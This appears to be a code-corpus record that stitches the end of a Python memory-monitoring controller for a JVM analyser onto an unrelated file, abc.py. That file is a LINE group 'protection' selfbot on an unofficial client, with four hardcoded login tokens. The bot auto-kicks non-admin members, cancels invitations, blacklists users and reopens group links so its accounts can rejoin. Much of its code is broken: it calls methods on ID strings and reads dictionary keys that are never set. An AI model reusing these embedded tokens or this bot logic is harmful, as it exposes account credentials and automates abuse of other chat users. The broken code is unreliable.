self.analyser = config_util.load_module(self.config, "Analyser",
analysis.Analyser,
neo4j_cfg)
def _query(self, msg):
if not jpype.isThreadAttachedToJVM():
jpype.attachThreadToJVM()
return query.ClientQueryControl.exec_method(
self.analyser.db_iface, msg)
self.query = types.MethodType(_query, self)
if __debug__:
logging.debug("Starting analyser....")
self.analyser.start()
self.pf_queue.register_event(self.snapshot_event, SnapshotException())
while True:
try:
if self.snapshot_event.is_set():
if __debug__:
logging.debug("Snapshot event set, "
"fetcher exiting loop")
break
msg = self.pf_queue.dequeue()
self.analyser.put_msg(msg)
except Queue.Empty:
if(self.fetcher_stop_event.is_set() and
self.pf_queue.get_queue_size() == 0):
break
except SnapshotException:
logging.error("Snapshot event set!!")
self.analyser.snapshot_shutdown()
break
if __debug__:
logging.debug("Shutting down analyser....")
if self.analyser.do_shutdown(self.drop):
if __debug__:
logging.debug("Analyser has successfully shutdown")
else:
if __debug__:
logging.debug("Failed to shutdown analyser")
def _check_mem_condition(self, fetch_proc):
'''Checks JVM heap memory size and available memory on the system'''
proc_mem_info = fetch_proc.memory_info()
if __debug__:
logging.debug("RSS: %d", proc_mem_info.rss)
# If the JVM's current heap size is greater than 90%
# of the maximum value of heap size, restart analyser
(status, output) = commands.getstatusoutput(
'jstat -gccapacity %d' % (fetch_proc.pid))
if status != 0:
logging.error("%d: %s", status, output)
else:
lines = output.split('\n')
fields = lines[1].split()
jstat_max_jvm = float(fields[1]) + float(fields[7])
heap_size = float(fields[3]) + float(fields[4])
heap_size += float(fields[5]) + float(fields[9])
if __debug__:
logging.debug("JVM current heap size: %f MB, "
"Max heap size: %f MB",
(heap_size / 1024),
(jstat_max_jvm / 1024))
if(heap_size >=
(self.memory_params['jvm_usage_threshold'] * jstat_max_jvm)):
logging.error("Warning!! JVM heap size above threshold, "
"current_heap: %f MB, max_heap: %f MB",
(heap_size / 1024), (jstat_max_jvm / 1024))
return True
# If the resident set size has increased beyond the maximum
# RSS threshold, restart the analyser
if('max_rss_threshold' in self.memory_params and
self.memory_params['max_rss_threshold'] is not None):
rss_in_mb = proc_mem_info.rss / (1024 * 1024)
if rss_in_mb > self.memory_params['max_rss_threshold']:
logging.info("Warning!! RSS: %f MB exceeded beyond "
"maximum threshold: %f MB",
rss_in_mb,
self.memory_params['max_rss_threshold'])
return True
# If system available memory is less than 25% of total memory
# and the analyser's RSS is more than 35% of the total memory,
# then restart the analyser
sys_mem_info = psutil.virtual_memory()
avail_mem = sys_mem_info.available
total_mem = sys_mem_info.total
if((avail_mem < (self.memory_params['min_percent_avail_mem'] *
total_mem)) and
(proc_mem_info.rss > (self.memory_params['max_rss_percent_mem'] *
total_mem))):
logging.error("System is running low on memory!!")
logging.error("Total mem: %d, Available mem: %d, Analyser mem: %d",
total_mem, avail_mem, proc_mem_info.rss)
return True
return False
def _run_mem_monitor(self):
'''Monitor the memory usage of the fetcher process'''
fetch_proc = psutil.Process(self.fetcher.pid)
time.sleep(1)
while not self.mem_mon_stop_event.is_set():
if not fetch_proc.is_running():
logging.error("Error: Fetcher with pid: %d is not running",
self.fetcher.pid)
break
if self._check_mem_condition(fetch_proc):
if self.snapshot_shutdown():
self._start_fetcher()
fetch_proc = psutil.Process(self.fetcher.pid)
else:
logging.error("Failed to shutdown fetcher/analyser, "
"restart manually")
break
time.sleep(self.mem_mon_params['mon_interval'])
def snapshot_shutdown(self):
'''Tells the analyser take a snapshot of its state and shutdown'''
self.snapshot_event.set()
self.pf_queue.wakeup()
try:
self.fetcher.join()
except RuntimeError as exc:
logging.error("Failed to snapshot and shutdown fetcher.")
logging.error(exc)
return False
return True
def _stop_mem_monitor(self):
'''Stops the memory monitor thread'''
if not self.mem_mon_params['mon_status']:
return True
self.mem_mon_stop_event.set()
try:
if __debug__:
logging.debug("Waiting for the memory monitor to join")
self.mem_monitor.join(self.mem_mon_params['mon_interval'] * 2)
except RuntimeError as exc:
logging.error("Failed to shutdown memory monitor thread.")
logging.error(exc)
return False
return True
def do_shutdown(self, drop):
'''Initiates shutdown of analyser controller'''
self.drop = drop
self.fetcher_stop_event.set()
try:
self.fetcher.join()
except RuntimeError as exc:
logging.error("Failed to shutdown fetcher process sucessfully.")
logging.error(exc)
return False
return self._stop_mem_monitor()
|
abc.py
|
# -*- coding: utf-8 -*-
import FXR
from FXR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re
#kk = FXR.LINE()
#kk.login(qr=True)
#kk.loginResult()
cl = FXR.LINE()
cl.login(token="EmJP3cTCBBbxHq0PFdBb.TOwfr+vlbbebmmu/8etFgW.Tzn0ZFqDvUXD/jWhM/c/CgsPuaiV1kssQybIx8ZbdPs=")
ki = FXR.LINE()
ki.login(token="EmgF0AVGiGl8QAfvrNhd.NxllMtv6lqmOeR+fBoKPdq.0M6yj8tTk8PF7xHSMVxBkNqUkFnNnFODTx3aeSDYd/A=")
kk = FXR.LINE()
kk.login(token="Emd0Ugxca7DreRgUPqfe.D2UjDHf7T6UbYDdb8RmhhG.jouUV0WbNd2IRveT3B1ziqb+qDqByX6NqeLp70lASoc=")
kc = FXR.LINE()
kc.login(token="EmrEJYG9GKIazvHUoTTd.5+WFW3AUqznDTUyXU1x0Fq.gG7iMVl9Lb3OFpZ2DoYovuzXfCKomEBRzLQn5ryOJrI=")
reload(sys)
print "login success"
sys.setdefaultencoding('utf-8')
helpMessage =""" 〘тєαм вσт є∂ιтє∂〙
☁̸҉̸.̸҉ =ȼ๏ʍʍąɲď β๏ţ ̸҉̸.̸҉̸☁
[@Key,@key,@help,@Help]
[@set group]
[@bot?]
[@Creator,@creator]
[@Me]
[@Gift]
[@All gift]
[@Cancel,@cancel]
[@Open url,@open url]
[@Close url,@close url]
[Ginfo]
[@Id Group]
[@My mid]
[@Mid all]
[Wkwkwk,Wkwk,Wk,wkwkwk,wkwk,wk]
[Hehehe,Hehe,He,hehehe,hehe,he]
[Galau]
[You]
[Hadeuh]
[Please]
[Haaa]
[Lol]
[Hmmm,Hmm,Hm,hmmm,hmm,hm]
[Welcome]
[@Joinn on,@joinn on]
[@Joinn off,@joinn off]
[@Cancl on,@cancl on]
[@Cancl off,@cancl off]
[@Gr on,@gr on]
[@Gr off,@gr off]
[@Contact On,@Contact on,@contact on]
[@Contact Off,@Contact off,@contact off]
[@set view]
[@group id]
[@cancelall]
[@cctv]
[@nongol]
[@all join,@semua masuk,@pus]
[@Bye all]
[Tagall,kiwkiw,Kiwkiw,tagall]
[@Pembersihan]
[Nk ]
[@Ban @]
[@Unban @]
[@Reset,@reset]
[Copy @]
[@Up,@up,@Up Chat,@Up chat,@up chat,@Upchat,@upchat]
[@bc ]
[@list group]
[ZSIsay hi,pagi,bobo ah"]
[@PING,@Ping,@ping]
[Respon,respon,Respon Dong,respon dong]
[Respon beb]
[@speed,@speedbot]
[@bl ]
[@ban]
[@unban]
[@banlist]
[@cek ban]
[@kill ban]
[Admin add @]
[@admin remove @]
[@list admin,@adminlist]
"""
Setgroup =""" Private Menu B̳O̳T̳ L̳I̳N̳E̳ E̳D̳I̳T̳E̳D̳
[Protect Group]
-- Gr on/off
[Mid Via Contact]
-- Contact on/off
[Cancel All Invited]
-- Cancl on/off
[No Joinned]
-- Joinn on/off
"""
#"u532647a27196dbe0b82b874e047da521"
KAC=[cl,ki,kk,kc]
DEF=[ki,kk,kc]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,]
admin=["u349dbde6509797ddc33adce5b85cd856","udf271394eea3e117351be4e30654140c","u97f705b63d3da6099072d4ccf6a299e2","u16bc85075e502b66e4b715069bc05cb1","ud0c9863689311b0da0c8566f4401281d","uc103c714511b0b65dc30315ec9c58f95"]
owner=["u349dbde6509797ddc33adce5b85cd856"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':True,
'message':"Thanks for add",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"ZSI",
"cName2":"ZSI2",
"cName3":"ZSI3",
"cName4":"ZSI4",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
"Protectjoin":False,
"Protectcancl":True,
"protectionOn":True,
"atjointicket":True,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
return image
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self.Talk.client.sendMessage(0,M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "\n・" + Name
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait['readPoint']:
if msg.from_ in wait["ROM"][msg.to]:
del wait["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if op.param2 in admin:
pass
else:
if op.param2 not in Bots:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).updateGroup(G)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
if op.param2 in admin:
pass
else:
if op.param2 not in Bots:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
random.choice(DEF).cancelGroupInvitation(op.param1, gMembMids)
#------Cancel Invite User Finish------#
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
cl.acceptGroupInvitation(op.param1)
cl.inviteIntoGroup(op.param1,admin)
print "BOT 1 Joined"
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
kk.acceptGroupInvitation(op.param1)
kk.inviteIntoGroup(op.param1,admin)
print "BOT 2 Joined"
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
ki.acceptGroupInvitation(op.param1)
ki.inviteIntoGroup(op.param1,admin)
print "BOT 3 Joined"
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
kc.acceptGroupInvitation(op.param1)
kc.inviteIntoGroup(op.param1,admin)
print "BOT 4 Joined"
else:
print "autoJoin is Off"
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = Amid.getGroup(op.param1)
G.preventJoinByTicket = False
Amid.updateGroup(G)
Ticket = Amid.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
Amid.updateGroup(G)
Ticket = Amid.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Amid:
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
# if op.param3 in Dmid:
# if op.param2 in Cmid:
# X = kc.getGroup(op.param1)
# X.preventJoinByTicket = False
# kc.updateGroup(X)
# Ti = kc.reissueGroupTicket(op.param1)
# ks.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# ks.updateGroup(X)
# Ti = ks.reissueGroupTicket(op.param1)
# if op.param3 in Emid:
# if op.param2 in Dmid:
# X = ks.getGroup(op.param1)
# X.preventJoinByTicket = False
# ks.updateGroup(X)
# Ti = ks.reissueGroupTicket(op.param1)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# ka.updateGroup(X)
# Ti = ka.reissueGroupTicket(op.param1)
#
# if op.param3 in Fmid:
# if op.param2 in Emid:
# X = ka.getGroup(op.param1)
# X.preventJoinByTicket = False
# ka.updateGroup(X)
# Ti = ka.reissueGroupTicket(op.param1)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# kb.updateGroup(X)
# Ti = kb.reissueGroupTicket(op.param1)
# if op.param3 in Gmid:
# if op.param2 in Fmid:
# X = kb.getGroup(op.param1)
# X.preventJoinByTicket = False
# kb.updateGroup(X)
# Ti = kb.reissueGroupTicket(op.param1)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# ko.updateGroup(X)
# Ti = ko.reissueGroupTicket(op.param1)
# if op.param3 in Hmid:
# if op.param2 in Gmid:
# X = ko.getGroup(op.param1)
# X.preventJoinByTicket = False
# ko.updateGroup(X)
# Ti = ko.reissueGroupTicket(op.param1)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# ke.updateGroup(X)
# Ti = ke.reissueGroupTicket(op.param1)
# if op.param3 in Imid:
# if op.param2 in mid:
# X = cl.getGroup(op.param1)
# X.preventJoinByTicket = False
# cl.updateGroup(X)
# Ti = cl.reissueGroupTicket(op.param1)
# ku.acceptGroupInvitationByTicket(op.param1,Ti)
# X.preventJoinByTicket = True
# cl.updateGroup(X)
# Ti = cl.reissueGroupTicket(op.param1)
if op.type == 13:
print op.param1
print op.param2
print op.param3
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 15:
random.choice(KAC).sendText(op.param1, "Good bye.")
print op.param3 + "has left the group"
#------Joined User Kick start------#
if op.type == 17:
if wait["Protectjoin"] == True:
if op.param2 not in Bots:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
#------Joined User Kick start------#
if op.type == 17:
group = cl.getGroup(op.param1)
cb = Message()
cb.to = op.param1
cb.text = "Hi " + cl.getContact(op.param2).displayName + ", welcome to " + group.name
cl.sendMessage(cb)
if op.type == 19:
if op.param2 not in Bots:
random.choice(DEF).kickoutFromGroup(op.param1,[op.param2])
random.choice(DEF).inviteIntoGroup(op.param1,[op.param3])
else:
pass
if op.type == 19:
if op.param3 in admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,admin)
else:
pass
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
#ka.acceptGroupInvitationByTicket(op.param1,Ti)
#kb.acceptGroupInvitationByTicket(op.param1,Ti)
#ko.acceptGroupInvitationByTicket(op.param1,Ti)
#ke.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
#ka.acceptGroupInvitationByTicket(op.param1,Ti)
#kb.acceptGroupInvitationByTicket(op.param1,Ti)
#ko.acceptGroupInvitationByTicket(op.param1,Ti)
#ke.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
ki.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
G = kk.getGroup(op.param1)
G.preventJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
G = kc.getGroup(op.param1)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
# if Dmid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = ks.getGroup(op.param1)
# G.preventJoinByTicket = True
# ks.updateGroup(G)
# Ticket = ks.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# if Emid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
# ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
# ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = ka.getGroup(op.param1)
# G.preventJoinByTicket = True
# ka.updateGroup(G)
# Ticket = ka.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# if Fmid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
# ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
# kb.acceptGroupInvitationByTicket(op.param1,Ti)
#ko.acceptGroupInvitationByTicket(op.param1,Ti)
# ke.acceptGroupInvitationByTicket(op.param1,Ti)
# G = kb.getGroup(op.param1)
# G.preventJoinByTicket = True
# kb.updateGroup(G)
# Ticket = kb.reissueGroupTicket(op.param1)
# if op.param2 in wait["blacklist"]:
#$ pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
# if Gmid in op.param3:
# if op.param2 in Bots:
# pass
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# except:
# try:
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
# random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
# except:
# print ("client Because it is not in the group or Because it does not exist in the group \n["+op.param1+"]\nOf\n["+op.param2+"]\n I could not kick \n Add it to the black list.")
# if op.param2 in wait["blacklist"]:
# pass
# if op.param2 in wait["whitelist"]:
# pass
# else:
# wait["blacklist"][op.param2] = True
#
# X = random.choice(KAC).getGroup(op.param1)
# X.preventJoinByTicket = False
# random.choice(KAC).updateGroup(X)
# Ti = random.choice(KAC).reissueGroupTicket(op.param1)
# cl.acceptGroupInvitationByTicket(op.param1,Ti)
# ki.acceptGroupInvitationByTicket(op.param1,Ti)
# kk.acceptGroupInvitationByTicket(op.param1,Ti)
# kc.acceptGroupInvitationByTicket(op.param1,Ti)
#ks.acceptGroupInvitationByTicket(op.param1,Ti)
# ka.acceptGroupInvitationByTicket(op.param1,Ti)
